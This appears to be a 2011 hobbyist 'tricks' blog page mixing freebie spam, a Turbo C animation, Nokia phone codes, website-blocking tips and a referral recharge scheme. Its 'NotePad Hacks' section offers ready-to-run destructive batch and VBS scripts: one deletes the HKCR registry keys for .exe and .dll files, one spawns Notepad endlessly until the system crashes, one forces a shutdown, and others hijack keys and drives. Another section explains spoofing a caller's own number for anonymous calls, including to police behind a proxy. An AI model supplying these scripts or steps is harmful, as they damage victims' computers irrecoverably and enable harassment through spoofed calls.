Friday, 30 September 2011
Hello friends,
Sign up for a free sample and try out all new Colgate Sensitive Pro-Relief.
Click here to get free sample:
http://www.colgatepromotions.c o.in/?rid=47001
Free Colgate Sensitive Pro-Relief Toothpaste
Thursday, 29 September 2011
To execute copy code and then save in notepad and save as bat file(.bat)
1. To Stupidity Shutdown Computer –>
*This pops up a funny message then will shutdown the computer*
CODE:
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10
2. Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK] –>
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*
CODE :
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE
3. Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
CODE :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
4. Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
CODE :
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
5. Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*
CODE :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
6. Endless Backspace
*This makes it so the backspace key is constantly being pressed*
CODE :
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
7. Popping CD Drives
*This will make the CD drives constantly pop out*
CODE :
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
NotePad Hacks
HERE IT IS...!
1.] Launch your browser and play the video till its entirely buffered.
2.] Close the browser or the tab in which the video was buffered.
3.] Visit your browser’s cache location: ex. If you use Google Chrome then (C:\Documents and Settings\[user name]\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache)
(For other browsers just check your browser’s cache location after: {C:\Documents and Settings\[user name]\Local Settings\Application Data\[according to your browser]})
4.] Right click and arrange icons by modified.
5.] The last file is your video.
6.] Rename the file and give it a “ .flv “ extension.
7.] You’re done. Enjoy the saved video.
Note- Copy that file to your desired location, as the cache memory is temporary memory. So if you copy that file to another location it makes the file permanent.
HOW TO SAVE VIDs. FROM YOUTUBE !?
Mobile hack to call your friends:
1. Go to http://www.mobivox.com and register there for free account.
2. During registration, remember to insert ANY mobile number in "Phone number" field.
3. Complete registration and confirm your email id and then login to your account. Click on "Direct WebCall".
4. You will arrive at page . In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.
5. That's it. .itzz jst owsum guyzzz.........chck it ot......YOU CAN MAKE A CALL TO UR ANYONE EVEN POLICE(BUT USE PROXY)..!!!
ANONYMOUS CALLING SERVICE FOR 5 MINUTES
#include
#include
#include
void main()
{
int i,x1=15,x2=60,y1=20,y2=5;
clrscr();
for(i=0;i<=22;i++)
{
gotoxy(x1,5);
textcolor(i%15);
cprintf("*");
gotoxy(x2,20);
cprintf("*");
x2-=2;
delay(50);
x1+=2;
}
for(i=0;i<=15;i++)
{
gotoxy(15,y1);
textcolor(i);
cprintf("*");
gotoxy(60,y2);
cprintf("*");
delay(50);
y1-=1;
y2+=1;
}
x1=15,x2=60,y1=20,y2=5;
for(i=0;i<=23;i++)
{
textcolor(i+6);
gotoxy(x1,4);
cprintf("/");
gotoxy(x2,21);
cprintf("/");
delay(50);
x1+=2;
x2-=2;
}
for(i=0;i<=15;i++)
{
gotoxy(13,y1);
textcolor(i+1);
cprintf("/");
gotoxy(62,y2);
cprintf("/");
delay(50);
y1-=1;
y2+=1;
}
gotoxy(33,6);
textcolor(9);
cprintf("P"); delay(200);
cprintf("R"); delay(200);
cprintf("O"); delay(200);
cprintf("J"); delay(200);
cprintf("E"); delay(200);
cprintf("C"); delay(200);
cprintf("T "); delay(200);
cprintf("O"); delay(200);
cprintf("N"); delay(200);
textcolor(11+BLINK);
gotoxy(25,7);
cprintf("ATM"); delay(300);
cprintf(" MANAGEMENT"); delay(300);
cprintf(" SYSTEM"); delay(500);
textcolor(5);
gotoxy(20,9);
cprintf("Created By");
gotoxy(45,9);
cprintf("Guided By");
gotoxy(20,10);
cprintf("----------");
gotoxy(45,10);
cprintf("----------");
textcolor(2);
gotoxy(18,11);
cprintf("1.PAPU BHOI");
gotoxy(18,12);
cprintf("2.Student 2");
gotoxy(18,13);
cprintf("3.Student 3");
gotoxy(18,14);
cprintf("4.Student 4");
gotoxy(18,15);
cprintf("5.Student 5");
gotoxy(44,11);
cprintf("1.TEACHER NAME");
gotoxy(44,12);
cprintf("2.TEACHER NAME");
textcolor(BLUE);
gotoxy(18,18);
cprintf("YUVODAYA COLLEGE OF ADVANCED TECHONOLOGY");
textcolor(RED);
gotoxy(50,24);
cprintf("PRESS ANY KEY TO CONTINUE...");
getch();
}
I made this animation for a project in my College. You can change here as your wish. Copy this code and paste it in notepad and save it as .c exetension. Then open it with turbo c++ and press ctrl+f9 to run.... Hope You Enjoy
A simple animation in C (turbo c++ compiler)
Full Database of Nokia Secret Codes
Below, I have listed all Nokia secret codes. On the main screen type:
*#06# - is used to check the IMEI (International Mobile Equipment Identity).
*#7780# - resets to factory settings.
*#0000# - shows the software version of your mobile phone.
*#9999# - Phones software version if *#0000# does not work.
*#67705646# - clears the LCD display(operator logo).
*#147# - This lets you know who called you last (Only vodofone).
*#1471# - Last call (Only vodofone).
#pw+1234567890+1# - Provider Lock Status.
#pw+1234567890+2# - Network Lock Status.
#pw+1234567890+3# - Country Lock Status.
#pw+1234567890+4# - SIM Card Lock Status.
*#21# - This phone code allows you to check the number that "All Calls" are diverted to.
*#2640# - Displays phone security code in use.
*#30# - Lets you see the private number.
*#2820# - shows the address of your Bluetooth device.
*#62209526# - Display the WLAN adapter's MAC Address. It is available only for newer devices which support WLAN such as N80.
*#746025625# - Sim clock allowed status.
#pw+1234567890+1# - Displays any restrictions that your sim has.
Full Database of nokia secret codes
Hi frnds,
here is a trick to convert google name into you name
i m nt joking frnds, its possible
Now covert the google home page into page with your name ..
Click here
Enjoy with google
Convert google name into your name
Here are many reason why you need to know how to block a website. Some of the most common reasons are you have been targeted by spammers who use adware and popups to attack your PC. Other reasons may be to prevent your children from having access to certain site content such as porn and gambling.
How to block a Website using Internet Explorer
Internet Explorer version 5 and later offer the ability for heighten security and privacy. You can block a site by following the directions below:
1. Load your Internet explorer
2. Click Tools
3. Click Internet Options
4. Click the Privacy tab
5. Under the Privacy window, Click Sites
6. Type in the site address that you want to Block and Click OK. Remember this technique only blocks on one site at a time. Parental control software will allow you to block multiple sites and categories.
Here are alternate instructions to block a website using Internet Explorer.
Tools ->Internet Options->Security->Restricted sites->Sites->Type in the site address and Click ADD then click OK
How to Block A Website in All Web Browsers
In Windows XP
1. GO TO RUN COMMAND
2. Type: notepad C:/Windows/System32/drivers/etc/hosts
3. Locate the line 127.0.0.1 localhost
4. To block the website google.com for example, just add this text under 127.0.0.1 localhost:
127.0.0.1 google.com
127.0.0.1 www.google.com
You can add as many sites any site, However you will need to prefix it with "127.0.0.1".
5. Save the file
Google will now be blocked in all web browser. This is an advanced but easy method on how to blow a website.
Hoe to Block a Website
Wednesday, 28 September 2011
U DON'T NEED TO LEARN ANY LANGUAGE JUST FOLLOW THESE STEPS
1.open notepad
2.copy the red thing given below and paste it in notepad..
Dim msg, sapi
msg=InputBox("Enter your text","Message Box")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
3.save it as ...anyname.vbs
(remember the extension name its should be .vbs nothing else)
4.now open it and write anything in the text box..press enter...done enjoy
Text to Voice in Notepad
Hello frds, if you want to create your own news paper then must check out
Now its very easy to publish
your Newspaper within Seconds ,
Just fill out this :
- Name of the newspaper:
- Date:
- Headline:
- Enter your story:
How to Create Your own Newspaper
HI FRENDZ,THIS IS A NEW RECHARGE TRICK. ACYUALLY IT IS NOT A TRICK. ITS A LEGAL ACTIVITY WHICH GIVE ATLEAST OF RS.100/- IN TWO DAYS.
NOW, I STARTED THIS B4 4 DAYS..AND NOW I GOT TOTAL RS.100 IN MY IDEA MOBILE. WE CAN RECHARGE ANY OPERATOR/NETWORK NUMBER AS OUR WISH..
lets start it here,b4 u start all are needed the followings..
1.Facebook Account
2.Real mobile number
3.PC
and a few chunks of your brain also. Embee is a facebook application that’s why you need to have a facebook account.
* Login with your facebook account.
* Then go to this link:
CLICK HERE
Start using Embee Mobile Now!. Install the application.
* Next, verify your number. (cant be done on mobile)
* Verify email. (cant be done on mobile too)
* After doing that, you automatically will have a total of 50 embee points.
* Click on Redeem Tab and complete offers for points.
* Invite friends so you can also have Invite Bonus.
AT FIRST U NEED TO GET 150 POINTS FOR 50RS
and 300 points e 100 rs..RECHARGE...
so invite many freinds and point to be collect and free recharge.